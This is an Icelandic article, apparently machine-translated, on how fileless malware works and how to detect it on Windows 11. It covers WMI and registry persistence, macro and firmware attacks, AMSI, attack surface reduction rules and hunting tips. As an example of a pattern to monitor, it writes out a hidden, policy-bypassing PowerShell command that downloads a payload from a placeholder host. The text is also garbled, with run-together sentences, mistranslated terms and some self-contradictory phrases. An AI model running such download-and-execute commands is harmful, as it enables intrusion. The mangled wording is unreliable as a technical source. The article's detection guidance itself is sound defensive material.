Hvernig á að greina hættulegan skrálausan spilliforrit í Windows 11

¿Hvernig á að greina hættulega skrálausa spilliforrit? Skráarlausar árásir hafa aukist verulega og til að gera illt verra, Windows 11 er ekki ónæmtÞessi aðferð fer fram hjá disknum og treystir á minni og lögmæt kerfistól; þess vegna eiga undirskriftarbundin vírusvarnarforrit erfitt með það. Ef þú ert að leita að áreiðanlegri leið til að greina það, þá liggur svarið í því að sameina... Fjarmælingar, hegðunargreining og Windows stýringar.

Í núverandi vistkerfi eru herferðir sem misnota PowerShell, WMI eða Mshta til samhliða flóknari aðferðum eins og minnisinnspýtingum, viðvarandi aðferðum „án þess að snerta“ diskinn og jafnvel ... misnotkun á vélbúnaðiLykilatriðið er að skilja ógnarkortið, árásarstigin og hvaða merki þau skilja eftir jafnvel þegar allt gerist innan vinnsluminni.

Hvað er skráarlaus spilliforrit og hvers vegna er það áhyggjuefni í Windows 11?

Þegar við tölum um „skráarlausar“ ógnir erum við að vísa til skaðlegs kóða sem Þú þarft ekki að leggja inn nýjar keyrsluskrár í skráarkerfinu til að virka. Það er venjulega sprautað inn í keyrandi ferla og keyrt í vinnsluminni, með því að nota túlka og tvíundaskrár sem Microsoft undirritar (t.d. PowerShell, WMI, rundll32, mshtaÞetta minnkar umferðarspor þitt og gerir þér kleift að komast framhjá vélar sem aðeins leita að grunsamlegum skrám.

Jafnvel Office skjöl eða PDF skjöl sem nýta sér veikleika til að ræsa skipanir eru talin hluti af fyrirbærinu, vegna þess að virkja keyrslu í minni án þess að skilja eftir gagnlegar tvíundarskrár til greiningar. Misnotkun á makró og DDE Í Office, þar sem kóðinn keyrir í lögmætum ferlum eins og WinWord.

Árásarmenn sameina félagsverkfræði (netveiðar, ruslpósttengla) og tæknilegar gildrur: smell notandans hleypir af stað keðju þar sem forskrift hleður niður og keyrir lokaupplýsingarnar í minninu, forðast að skilja eftir spor á disknum. Markmiðin eru allt frá gagnaþjófnaði til keyrslu ransomware og hljóðlátrar hliðarhreyfingar.

Tegundir eftir fótspori í kerfinu: frá „hreinu“ til blendinga

Til að forðast rugling á hugtökum er gagnlegt að aðgreina ógnir eftir því hversu mikið þær hafa samskipti við skráarkerfið. Þessi flokkun skýrir Hvað varir, hvar geymist kóðinn og hvaða merki skilur hann eftir?.

Tegund I: engin skráarvirkni

Algjörlega skráarlaus spilliforrit skrifa ekkert á disk. Klassískt dæmi er að nýta sér netöryggisbrestur (eins og EternalBlue vektorinn áður fyrr) til að útfæra bakdyr sem eru í kjarnaminni (tilvik eins og DoublePulsar). Hér gerist allt í vinnsluminni og engar villur eru í skráarkerfinu.

Annar möguleiki er að menga vélbúnaðar af íhlutum: BIOS/UEFI, netkortum, USB jaðartækjum (tækni af gerðinni BadUSB) eða jafnvel undirkerfum örgjörva. Þau halda áfram að virka eftir endurræsingu og enduruppsetningu, með þeim aukna erfiðleikum að Fáar vörur skoða vélbúnaðarhugbúnaðÞetta eru flóknar árásir, sjaldgæfari, en hættulegar vegna laumuspils og endingar.

Tegund II: Óbein skjalavörslustarfsemi

Hér „skilur spilliforritið ekki eftir“ sína eigin keyrsluskrá heldur notar kerfisstýrða gáma sem eru í raun geymdir sem skrár. Til dæmis bakdyr sem planta powershell skipanir í WMI geymslunni og ræsa keyrslu hennar með atburðasíum. Það er mögulegt að setja það upp úr skipanalínunni án þess að sleppa tvíundarskrám, en WMI geymslunni er geymt á diski sem lögmætur gagnagrunnur, sem gerir það erfitt að hreinsa hana án þess að hafa áhrif á kerfið.

Frá hagnýtu sjónarmiði eru þau talin skráarlaus, því sá gámur (WMI, Registry, o.s.frv.) Þetta er ekki hefðbundin greinanleg keyrsluskrá Og hreinsun þess er ekki einföld. Niðurstaðan: laumuleg þrautseigja með litlum „hefðbundnum“ ummerkjum.

Tegund III: Krefst skráa til að virka

Sum tilvik viðhalda „skráarlaus“ varanleiki Á rökréttu stigi þurfa þeir skráartengdan kveikju. Dæmigert dæmi er Kovter: það skráir skelsagn fyrir handahófskennda skráarendingu; þegar skrá með þeirri skráarendingu er opnuð ræsist lítið forskrift sem notar mshta.exe, sem endurskapar skaðlega strenginn úr skrásetningunni.

Bragðið er að þessar „beitu“ skrár með handahófskenndum viðskeytum innihalda ekki greinanlegan farm og meginhluti kóðans er í skráning (annar gámur). Þess vegna eru þeir flokkaðir sem skráarlausir hvað varðar áhrif, jafnvel þótt strangt til tekið séu þeir háðir einum eða fleiri diskaskemmdum sem kveikju.

Smitberar og „hýslar“: hvar það berst inn og hvar það felur sig

Til að bæta greiningu er mikilvægt að kortleggja komustað og hýsil sýkingarinnar. Þetta sjónarhorn hjálpar til við að hanna sértækt eftirlit Forgangsraða viðeigandi fjarmælingum.

hetjudáð

• Skráarbundið (Tegund III): Skjöl, keyrsluskrár, eldri Flash/Java skrár eða LNK skrár geta nýtt sér vafrann eða vélina sem vinnur úr þeim til að hlaða skelkóða inn í minni. Fyrsti vektorinn er skrá, en gagnamagnið fer í vinnsluminni.
• Netbundið (Tegund I): Pakki sem nýtir sér veikleika (t.d. í SMB) nær keyrslu í notendalandi eða kjarna. WannaCry gerði þessa aðferð vinsæla. Bein minnishleðsla án nýrrar skráar.

Vélbúnaður

• Tæki (Tegund I): Hægt er að breyta vélbúnaði disks eða netkorts og setja inn kóða. Erfitt að skoða og er til staðar utan stýrikerfisins.
• Örgjörvi og stjórnunarkerfi (Tegund I): Tækni eins og ME/AMT frá Intel hefur sýnt leiðir til að Nettenging og framkvæmd utan stýrikerfisinsÞað ræðst á mjög lágt stig, með miklum möguleikum á laumuspili.
• USB (Tegund I): BadUSB gerir þér kleift að endurforrita USB-drif til að herma eftir lyklaborði eða netkorti og ræsa skipanir eða beina umferð.
• BIOS / UEFI (Tegund I): illgjarn endurforritun vélbúnaðar (tilvik eins og Mebromi) sem keyrir áður en Windows ræsist.
• Yfirvörður (Tegund I): Útfærsla á litlum hypervisor undir stýrikerfinu til að fela nærveru þess. Sjaldgæft en hefur þegar sést í formi hypervisor rótarbúnaðar.

Framkvæmd og innspýting

• Skráarbundið (Tegund III): EXE/DLL/LNK eða áætluð verkefni sem ræsa inndælingar í lögmæta ferla.
• Fjölvi (Tegund III): VBA í Office getur afkóðað og keyrt gagnamagn, þar á meðal fullt ransomware, með samþykki notandans með blekkingum.
• Scripts (Tegund II): PowerShell, VBScript eða JScript úr skrá, skipanalínu, þjónustu, skráningu eða WMIÁrásarmaðurinn getur slegið inn handritið í fjarfundarlotu án þess að snerta diskinn.
• Ræsiskrá (MBR/Ræsing) (Tegund II): Fjölskyldur eins og Petya skrifa yfir ræsigeirann til að taka stjórn við ræsingu. Hann er utan skráarkerfisins en aðgengilegur stýrikerfinu og nútíma lausnum sem geta endurheimt hann.

Hvernig skráarlausar árásir virka: stig og merki

Þótt þær skilji ekki eftir keyrsluskrár fylgja herferðirnar stigvaxandi rökfræði. Að skilja þær gerir kleift að fylgjast með. atburðir og tengsl milli ferla sem skilja eftir sig spor.

• Upphafleg aðgangurNetveiðarárásir með tenglum eða viðhengjum, vefsíðum sem hafa verið brotnar niður eða stolnum innskráningarupplýsingum. Margar keðjur byrja með Office skjali sem virkjar skipun. PowerShell.
• Þrautseigjabakdyr í gegnum WMI (síur og áskriftir), Keyrslulyklar skrásetningar eða áætluð verkefni sem endurræsa forskriftir án þess að ný skaðleg skrá komi upp.
• ÚthreinsunÞegar upplýsingunum hefur verið safnað eru þær sendar út af netkerfinu með traustum ferlum (vafra, PowerShell, bitsadmin) til að blanda umferð.

Þetta mynstur er sérstaklega lúmskt vegna þess að árásarvísir Þau fela sig í eðlilegum málum: skipanalínubreytur, ferlakeðjutengingar, óeðlilegar útleiðartengingar eða aðgangur að innspýtingar-API.

Algengar aðferðir: frá minni til upptöku

Leikararnir reiða sig á fjölbreytt úrval af aðferðir sem hámarka laumuspil. Það er gagnlegt að vita hvaða algengustu eru til að virkja árangursríka uppgötvun.

• Íbúi í minninguHleður gagnamagn inn í rými trausts ferlis sem bíður eftir virkjun. Rootkits og krókar Í kjarnanum hækka þeir leyndarstigið.
• Varanleiki í skránniVistaðu dulkóðaða bletti í lyklum og endurvatnaðu þá úr lögmætum ræsiforriti (mshta, rundll32, wscript). Skammvinn uppsetningarforritið getur eyðilagt sig sjálft til að lágmarka notkun þess.
• Veiðar á persónuskilríkjumMeð því að nota stolin notendanöfn og lykilorð keyrir árásarmaðurinn fjarstýrðar skeljar og plöntur. hljóðlaus aðgangur í Registry eða WMI.
• Skráarlaus ransomwareDulkóðun og C2 samskipti eru stýrð úr vinnsluminni, sem dregur úr líkum á uppgötvun þar til tjónið er sýnilegt.
• Rekstrarbúnaðir: sjálfvirkar keðjur sem greina veikleika og dreifa eingöngu minnishleðslum eftir að notandinn smellir.
• Skjöl með kóðamakróar og aðferðir eins og DDE sem virkja skipanir án þess að vista keyrsluskrár á disk.

Rannsóknir í greininni hafa þegar sýnt fram á umtalsverða toppa: á einu tímabili árið 2018, a aukning um meira en 90% Í forskriftarbundnum og PowerShell keðjuárásum, merki um að vektorinn sé ákjósanlegur vegna skilvirkni sinnar.

Áskorunin fyrir fyrirtæki og birgja: hvers vegna það er ekki nóg að loka fyrir

Það væri freistandi að slökkva á PowerShell eða banna makró að eilífu, en Þú myndir brjóta aðgerðinaPowerShell er stoð nútíma stjórnsýslu og Office er nauðsynlegt í viðskiptum; það er oft ekki mögulegt að loka blindlega fyrir það.

Þar að auki eru til leiðir til að komast framhjá grunnstýringum: keyra PowerShell í gegnum DLL og rundll32, pakka forskriftum í EXE skrár, Komdu með þitt eigið eintak af PowerShell eða jafnvel fela forskriftir í myndum og draga þær út í minni. Þess vegna getur vörnin ekki byggst eingöngu á því að neita tilvist verkfæra.

Annað algengt mistök er að fela alla ákvörðunina í skýið: ef umboðsmaðurinn þarf að bíða eftir svari frá netþjóninum, Þú missir rauntíma forvarnirHægt er að hlaða upp fjarmælingagögnum til að auðga upplýsingarnar, en Mótvægisaðgerðir verða að eiga sér stað við endapunktinn.

Hvernig á að greina skráarlausa spilliforrit í Windows 11: fjarmælingar og hegðun

Sigurstefnan er fylgjast með ferlum og minniEkki skrár. Illgjarn hegðun er stöðugri en formið sem skrá tekur á sig, sem gerir hana tilvalda fyrir varnarvélar.

• AMSI (viðmót fyrir skaðforrit)Það grípur PowerShell, VBScript eða JScript forskriftir jafnvel þótt þær séu smíðaðar á kraftmikinn hátt í minni. Frábært til að fanga dulbúna strengi áður en þeir eru keyrðir.
• Eftirlit með ferlum: upphaf/mark, PID, foreldrar og börn, leiðir, skipanalínur og hass, auk framkvæmdatrjáa til að skilja alla söguna.
• Minnisgreining: greining á inndælingum, endurskins- eða PE-álagi án þess að snerta diskinn og yfirferð á óvenjulegum keyrslusvæðum.
• Verndun ræsigeira: stjórnun og endurheimt MBR/EFI ef átt hefur verið við þau.

Í vistkerfi Microsoft sameinar Defender for Endpoint AMSI, hegðunareftirlitMinnisskönnun og skýjabundið vélanám eru notuð til að stækka greiningar gegn nýjum eða dulbúnum afbrigðum. Aðrir framleiðendur nota svipaðar aðferðir með kjarnaíbúnum vélum.

Raunhæft dæmi um fylgni: frá skjali til PowerShell

Ímyndaðu þér keðju þar sem Outlook sækir viðhengi, Word opnar skjalið, virkt efni er virkjað og PowerShell er ræst með grunsamlegum breytum. Rétt fjarmæling myndi sýna Skipanalína (t.d. ExecutionPolicy Bypass, falinn gluggi), tengjast ótreystu léni og búa til undirferli sem setur sig upp í AppData.

Umboðsmaður með staðbundið samhengi er fær um að stöðva og bakka illgjarn athæfi án handvirkrar íhlutunar, auk þess að tilkynna SIEM eða með tölvupósti/SMS. Sumar vörur bæta við rótarorsökartilvísunarlagi (StoryLine-líkön), sem vísar ekki á sýnilegt ferli (Outlook/Word), heldur á fullur illgjarn þráður og uppruna þess til að hreinsa kerfið ítarlega.

Algengt skipanamynstur sem vert er að fylgjast með gæti litið svona út: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Rökfræði er ekki nákvæmlega rétta strengurinn, heldur mengi merkja: stefnusneiðing, falinn gluggi, hreinsað niðurhal og keyrsla í minni.

AMSI, leiðsla og hlutverk hvers aðila: frá endapunkti til SOC

Auk handritaskráningar skipuleggur öflug arkitektúr skref sem auðvelda rannsókn og viðbrögð. Því fleiri sannanir sem fylgja áður en álagið er framkvæmt, því betra., best.

• HandritshlerunAMSI afhendir efnið (jafnvel þótt það sé búið til á flugu) til kyrrstæðrar og breytilegrar greiningar í spilliforritaleiðslu.
• VinnsluatburðirPID, tvíundaskrár, hass, leiðir og önnur gögn eru safnað. rök, að koma á fót ferlistrénum sem leiddu til lokaálagsins.
• Greining og skýrslugjöfGreiningarnar eru birtar á vörustjórnborðinu og sendar áfram á netkerfi (NDR) til að sýna herferðina.
• Ábyrgðir notendaJafnvel þótt handrit sé sprautað inn í minni, þá er ramminn AMSI hlerar það í samhæfum útgáfum af Windows.
• Stjórnunarhæfni: stefnustillingar til að virkja handritskoðun, hegðunarbundin blokkun og búa til skýrslur úr stjórnborðinu.
• SOC vinna: útdráttur á gripum (VM UUID, stýrikerfisútgáfa, forskriftartegund, upphafsferli og foreldri þess, hass og skipanalínur) til að endurskapa söguna og lyftureglur framtíð.

Þegar kerfið leyfir útflutning á minnisbiðminni Í tengslum við framkvæmdina geta vísindamenn framleitt nýjar uppgötvanir og auðgað varnirnar gegn svipuðum afbrigðum.

Hagnýtar aðgerðir í Windows 11: forvarnir og veiðar

Auk þess að hafa EDR með minnisskoðun og AMSI, gerir Windows 11 þér kleift að loka árásarrýmum og bæta sýnileika með innbyggðar stýringar.

• Skráning og takmarkanir í PowerShellVirkjar skráningu handritsblokka og einingaskráningu, notar takmarkaðar stillingar þar sem það er mögulegt og stýrir notkun á Hliðraðu/Falið.
• Reglur um minnkun á árásarfleti (ASR): lokar fyrir að Office-ferlar ræsi forskriftir og Misnotkun á WMI/PSExec þegar það er ekki þörf á því.
• Stefnumál skrifstofunnar: slekkur sjálfgefið á innri undirritun makróa og ströngum traustlistum; fylgist með eldri DDE flæði.
• WMI endurskoðun og skráningfylgist með áskriftum að atburðum og sjálfvirkum keyrslulyklum (Run, RunOnce, Winlogon), sem og verkefnasköpun tímaáætlun.
• Ræsingarvörnvirkjar örugga ræsingu, athugar heilleika MBR/EFI og staðfestir að engar breytingar hafi verið gerðar við ræsingu.
• Viðgerðir og herðinglokar fyrir nýtanlegar veikleika í vöfrum, Office-íhlutum og netþjónustum.
• Meðvitund: þjálfar notendur og tækniteymi í netveiðum og merkjum um leynilegar aftökur.

Til að leita, einbeittu þér að fyrirspurnum um: að búa til ferla með Office í átt að PowerShell/MSHTA, rök með niðurhalsstrengur/niðurhalsskráForskriftir með skýrri dulúð, endurspeglunarinnspýtingum og útleiðandi netum til grunsamlegra TLD-tækja. Vísaðu þessi merki saman við orðspor og tíðni til að draga úr hávaða.

Hvað getur hver vél greint í dag?

Fyrirtækjalausnir Microsoft sameina AMSI, atferlisgreiningar, skoða minnið og verndun ræsigeira, auk skýjabundinna vélanámslíkana til að stækka gegn nýjum ógnum. Aðrir framleiðendur innleiða eftirlit á kjarnastigi til að greina á milli skaðlegs og skaðlegs hugbúnaðar með sjálfvirkri afturköllun breytinga.

Aðferð sem byggir á aftökusögur Það gerir þér kleift að bera kennsl á rót vandans (til dæmis viðhengi í Outlook sem kveikir á keðju) og draga úr áhrifum alls trésins: forskrifta, lykla, verkefna og millistigsskráa, og forðast að festast í sýnilegu einkennunum.

Algeng mistök og hvernig á að forðast þau

Að loka fyrir PowerShell án annarrar stjórnunaráætlunar er ekki aðeins óframkvæmanlegt, heldur eru einnig til staðar... leiðir til að kalla fram það óbeintÞað sama á við um makró: annað hvort stýrir þú þeim með stefnum og undirskriftum, eða fyrirtækið mun þjást. Það er betra að einbeita sér að fjarmælingum og hegðunarreglum.

Annað algengt mistök er að halda að forrit sem eru sett á hvítlista leysi allt: skráalaus tækni byggir einmitt á þessu. traust forritStjórnin ætti að fylgjast með því hvað þau gera og hvernig þau tengjast, ekki bara hvort þeim sé heimilt.

Með öllu þessu framangreinda hættir skráarlaus spilliforrit að vera „draugur“ þegar fylgst er með því sem raunverulega skiptir máli: hegðun, minni og uppruni hverrar keyrslu. Með því að sameina AMSI, öfluga ferlamælingar, innbyggða Windows 11 stýringu og EDR lag með hegðunargreiningu færðu forskot. Bættu við jöfnuna raunhæfum stefnum fyrir makró og PowerShell, WMI/Registry endurskoðun og veiðum sem forgangsraða skipanalínum og ferlatréum, og þú hefur vörn sem sker á þessar keðjur áður en þær gefa frá sér hljóð.